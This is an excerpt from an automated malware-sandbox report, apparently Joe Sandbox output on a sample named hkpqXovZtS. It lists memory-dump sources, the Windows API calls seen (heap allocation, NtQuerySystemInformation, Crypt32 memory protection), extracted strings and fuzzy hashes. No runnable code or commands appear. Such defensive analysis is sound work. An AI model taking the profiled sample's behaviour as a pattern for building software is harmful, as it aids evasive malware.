                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID:
                                                                                                                • API String ID: 3519838083-0
                                                                                                                • Opcode ID: 204225fd370e15f0e9935236bf399b5a8d328ae08fd7cb24cfd8ed0b73c44cc6
                                                                                                                • Instruction ID: 12b6cdf0504e8e8e4d3ffe247d21c8e274d40cea25b07612d523ec07e484e320
                                                                                                                • Opcode Fuzzy Hash: 204225fd370e15f0e9935236bf399b5a8d328ae08fd7cb24cfd8ed0b73c44cc6
                                                                                                                • Instruction Fuzzy Hash: 7B113030410F419AD728FB66D9536DEBBB4EF10708F400E6EA06B725D2AF786E44CE48
                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 022A7A19
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                • Opcode ID: 9a7359b4773ad95f87851d4818ee08819a2a666e63ec263142efeec8deed2964
                                                                                                                • Instruction ID: f45d664ef53d3c6bfe8415b3e1da204c46802ccf2626d88ca0211d06df3429a7
                                                                                                                • Opcode Fuzzy Hash: 9a7359b4773ad95f87851d4818ee08819a2a666e63ec263142efeec8deed2964
                                                                                                                • Instruction Fuzzy Hash: 24F02B3167062277AF215AF19C28B5EF749FF40760B148462AC0696888DB34D50085E8
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID:
                                                                                                                • API String ID: 3519838083-0
                                                                                                                • Opcode ID: d1011b4a530236cec844ef2aaabdf93ff99397e8f3bedf57033aa1edd207842c
                                                                                                                • Instruction ID: 4676c6699d0101cc9825e3f39fc19b8158240de837ab5ab823d9f2709d8006e6
                                                                                                                • Opcode Fuzzy Hash: d1011b4a530236cec844ef2aaabdf93ff99397e8f3bedf57033aa1edd207842c
                                                                                                                • Instruction Fuzzy Hash: 79F04F35B00214AFD7149B58C85ABADB7B5EF48724F208159E952A73E1CB749D00CA44
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0040543F
                                                                                                                  • Part of subcall function 00409DB1: __EH_prolog.LIBCMT ref: 00409DB6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID:
                                                                                                                • API String ID: 3519838083-0
                                                                                                                • Opcode ID: 6e02045fab941059f65ff4a154f2203e9c39ff24e10a8a0b29256c0ea5043523
                                                                                                                • Instruction ID: 40c3eb5563088174663048f5e38b888e729674675cca481110b70df2976217d2
                                                                                                                • Opcode Fuzzy Hash: 6e02045fab941059f65ff4a154f2203e9c39ff24e10a8a0b29256c0ea5043523
                                                                                                                • Instruction Fuzzy Hash: 75016D34651694DEC705E7E4C1217DDB7A49F34308F0040AEE456632C3CBF82B44CA65
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004071F9
                                                                                                                  • Part of subcall function 00414D94: __EH_prolog.LIBCMT ref: 00414D99
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID:
                                                                                                                • API String ID: 3519838083-0
                                                                                                                • Opcode ID: 341e869ecc4179afed5e20fd19188a1710d756600e918ce76fbab95388a4614a
                                                                                                                • Instruction ID: 56afb8b6ccf3b08ab66e565d94ddd098080b76072618de6acc7ed38b189a1fbe
                                                                                                                • Opcode Fuzzy Hash: 341e869ecc4179afed5e20fd19188a1710d756600e918ce76fbab95388a4614a
                                                                                                                • Instruction Fuzzy Hash: 72F08231600600DBC715EB55D4517EEB7B4AF85718F10466FE066636C1CBB86E458619
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004D103C: NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 004D1056
                                                                                                                • RegCloseKey.KERNEL32 ref: 00468471
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseFreeMemoryVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 2711871119-0
                                                                                                                • Opcode ID: 9c94fc4a45cceb731be6840bb9cc4d86251a5b3b339c24b2e1e7c5a830a9a862
                                                                                                                • Instruction ID: ec7d48f9962f92385e086f278855c482788979e1b8b6d39903ed5b05c0c3391d
                                                                                                                • Opcode Fuzzy Hash: 9c94fc4a45cceb731be6840bb9cc4d86251a5b3b339c24b2e1e7c5a830a9a862
                                                                                                                • Instruction Fuzzy Hash: 9DE06D3050410AEFCB11EFA5D581B6EB3E4AFC5708F80894FF24887217EB38A8019B5B
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 2102423945-0
                                                                                                                • Opcode ID: ee9828c554a4db0b44df66e38e15d315cdf1d24970fda13dfa077ecae02ec3b5
                                                                                                                • Instruction ID: 6b6e9163a40b9cdbbcca5be6a97a8d46a1995cf2690d9d845e8dc861eb38798a
                                                                                                                • Opcode Fuzzy Hash: ee9828c554a4db0b44df66e38e15d315cdf1d24970fda13dfa077ecae02ec3b5
                                                                                                                • Instruction Fuzzy Hash: D8E0CD7190475025D321511D9C04F57A6D85B91715F15C83FF058A32C2C1BC5C41C75D
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004D103C: NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 004D1056
                                                                                                                • RegCloseKey.KERNEL32 ref: 00468471
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseFreeMemoryVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 2711871119-0
                                                                                                                • Opcode ID: 4c494bc388c5ee9f03f29afb729e533da9459f73fe8753aadb097e9c5fa049bb
                                                                                                                • Instruction ID: 955c776a1d1e3a65268bdb694e4aec38169b7818c366181a3fd7b7c7f4cd751c
                                                                                                                • Opcode Fuzzy Hash: 4c494bc388c5ee9f03f29afb729e533da9459f73fe8753aadb097e9c5fa049bb
                                                                                                                • Instruction Fuzzy Hash: 79D0A70804148B794A123AF3B9E2ABD7785594331A7C4058FB600417376E0E1241056D
                                                                                                                APIs
                                                                                                                • _doexit.LIBCMT ref: 004206D2
                                                                                                                  • Part of subcall function 0042059A: __initterm.LIBCMT ref: 00420670
                                                                                                                  • Part of subcall function 0042059A: __initterm.LIBCMT ref: 00420680
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __initterm$_doexit
                                                                                                                • String ID:
                                                                                                                • API String ID: 1457160226-0
                                                                                                                • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                                • Instruction ID: ef2b215410fff71cddba942c18862738273fc0e873b6bf9cc3faac2dfeed7b07
                                                                                                                • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                                • Instruction Fuzzy Hash: BEB0923268021C33DA202542AC03F063B4A87C0B64E640021BA0C1D1A2A9A2A9A184DD
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Item
                                                                                                                • String ID:
                                                                                                                • API String ID: 3207170592-0
                                                                                                                • Opcode ID: 717afb6377721a8c3561f49ce9aa86fb33470c8ff035dd4e4f75ec1d2af72992
                                                                                                                • Instruction ID: 65e1ad9f224df52f49bfcdc5615452e7ee0584e9f18ae1ad460875678e4fc733
                                                                                                                • Opcode Fuzzy Hash: 717afb6377721a8c3561f49ce9aa86fb33470c8ff035dd4e4f75ec1d2af72992
                                                                                                                • Instruction Fuzzy Hash: D1C04C76009250BED7023BA19C14C6FBBE99B95211F55C95AB5A880031C63984509B25
                                                                                                                APIs
                                                                                                                • GetLastError.KERNEL32(?,000000FF,?), ref: 00408F01
                                                                                                                  • Part of subcall function 00408D5A: __EH_prolog.LIBCMT ref: 00408D5F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorH_prologLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 1057991267-0
                                                                                                                • Opcode ID: a183c24a2afad8874b0985ace0ecac72c18a9018df0b657ede04aae4a11c956f
                                                                                                                • Instruction ID: c93f1575e837a4b808ade84526d54479894f8a2543c249c9c4a9aa10862eb84d
                                                                                                                • Opcode Fuzzy Hash: a183c24a2afad8874b0985ace0ecac72c18a9018df0b657ede04aae4a11c956f
                                                                                                                • Instruction Fuzzy Hash: 52019231000305DBDB249F24CE04AAB77A6FF51364F14463FF9A0A62D0DF78D951DA98
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                                                                • API String ID: 0-1840816070
                                                                                                                • Opcode ID: d0c258ee0a76b36f1ee0b52904a1d61c9cb4faef01de8f0c13ef48c4b50bacf1
                                                                                                                • Instruction ID: a7f8116432e4b51e2bae2a804a5e65433a85644bdaa3587098c906cc1ded094b
                                                                                                                • Opcode Fuzzy Hash: d0c258ee0a76b36f1ee0b52904a1d61c9cb4faef01de8f0c13ef48c4b50bacf1
                                                                                                                • Instruction Fuzzy Hash: 3091757294121CBAEB21EBE0CC82FEF776DEB04704F500467BA05E61D1D679AE458B68
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __byteswap_ulong
                                                                                                                • String ID:
                                                                                                                • API String ID: 2309504477-0
                                                                                                                • Opcode ID: 8fadf0a658a046e613e6f6ee0120c6b4fdc4be59de6621fbc47c2dc855fc6684
                                                                                                                • Instruction ID: ae09c21276feb9784293b5133c474c8fe19c270e3c86d0be91ad24f9f1f1b2bb
                                                                                                                • Opcode Fuzzy Hash: 8fadf0a658a046e613e6f6ee0120c6b4fdc4be59de6621fbc47c2dc855fc6684
                                                                                                                • Instruction Fuzzy Hash: 2B91F771A00604CFCB24DF5AC982A9EB7F1FF48308F0445AEE54AE7762D734A9958F58
                                                                                                                APIs
                                                                                                                • NtQuerySystemInformation.NTDLL(00000005,00000000,00000000,00000000), ref: 004D10C0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InformationQuerySystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 3562636166-0
                                                                                                                • Opcode ID: e5fda7db3b634dabafd301b5c07e8c611a8d6a74eab8b1a3a86258f5aefeb9b9
                                                                                                                • Instruction ID: ef674d6f5e5b2fb620a1060b41ae7ae8028997c213016c9df34677ddefdda6e7
                                                                                                                • Opcode Fuzzy Hash: e5fda7db3b634dabafd301b5c07e8c611a8d6a74eab8b1a3a86258f5aefeb9b9
                                                                                                                • Instruction Fuzzy Hash: 1871C9B4D01209EFDF10DF94D968BEEBBB4AB48304F20809AD905B7390C7B95A85DF95
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __floor_pentium4
                                                                                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN$kL
                                                                                                                • API String ID: 4168288129-2108231660
                                                                                                                • Opcode ID: 60e164d3b6642213a3def2011ef3865377b113cce6ac2322ae7d3e6a38e20ccd
                                                                                                                • Instruction ID: 545bebec9e01a61cae0c24b270bcce453cca259297d2c2cd509dd8a382b472e7
                                                                                                                • Opcode Fuzzy Hash: 60e164d3b6642213a3def2011ef3865377b113cce6ac2322ae7d3e6a38e20ccd
                                                                                                                • Instruction Fuzzy Hash: 23D25A71E242298FDB65CEA8CD507EAB3B5EB44304F1545EAD40EE7A44E778AE81CF40
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memcmp$H_prolog
                                                                                                                • String ID: @$lB$lB
                                                                                                                • API String ID: 212800410-1963657377
                                                                                                                • Opcode ID: 670c3fa6525e6dbcabfcc6a184edee081faf9e168c82c6a5e3294fbc6d14a827
                                                                                                                • Instruction ID: 72478925cf9371104673018591e4c29575c5634b2171b1aafb1ce66178da3c0a
                                                                                                                • Opcode Fuzzy Hash: 670c3fa6525e6dbcabfcc6a184edee081faf9e168c82c6a5e3294fbc6d14a827
                                                                                                                • Instruction Fuzzy Hash: BD22F4715043849ADF14DF25C8857DA3BE4EF15308F08057FEC4AAB2D2DB79AA88CB59
                                                                                                                APIs
                                                                                                                • LoadLibraryW.KERNEL32(Crypt32.dll,00000020,0040CAD3,00000020,?,?,00405CBB,?,00000020,00000001,?,00000010,?,?,?,00000001), ref: 0040CA89
                                                                                                                • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0040CAA2
                                                                                                                • GetProcAddress.KERNEL32(004339B8,CryptUnprotectMemory), ref: 0040CAAE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$LibraryLoad
                                                                                                                • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                                                • API String ID: 2238633743-1753850145
                                                                                                                • Opcode ID: f300a98f2b62c7f3a1d6754c34f54a5a882d2040f422b21eb1fea9acfed9a943
                                                                                                                • Instruction ID: 55fd0b1eee952b3016a3883da5b333625fa6a0b6b7c783b45655f994e486e817
                                                                                                                • Opcode Fuzzy Hash: f300a98f2b62c7f3a1d6754c34f54a5a882d2040f422b21eb1fea9acfed9a943
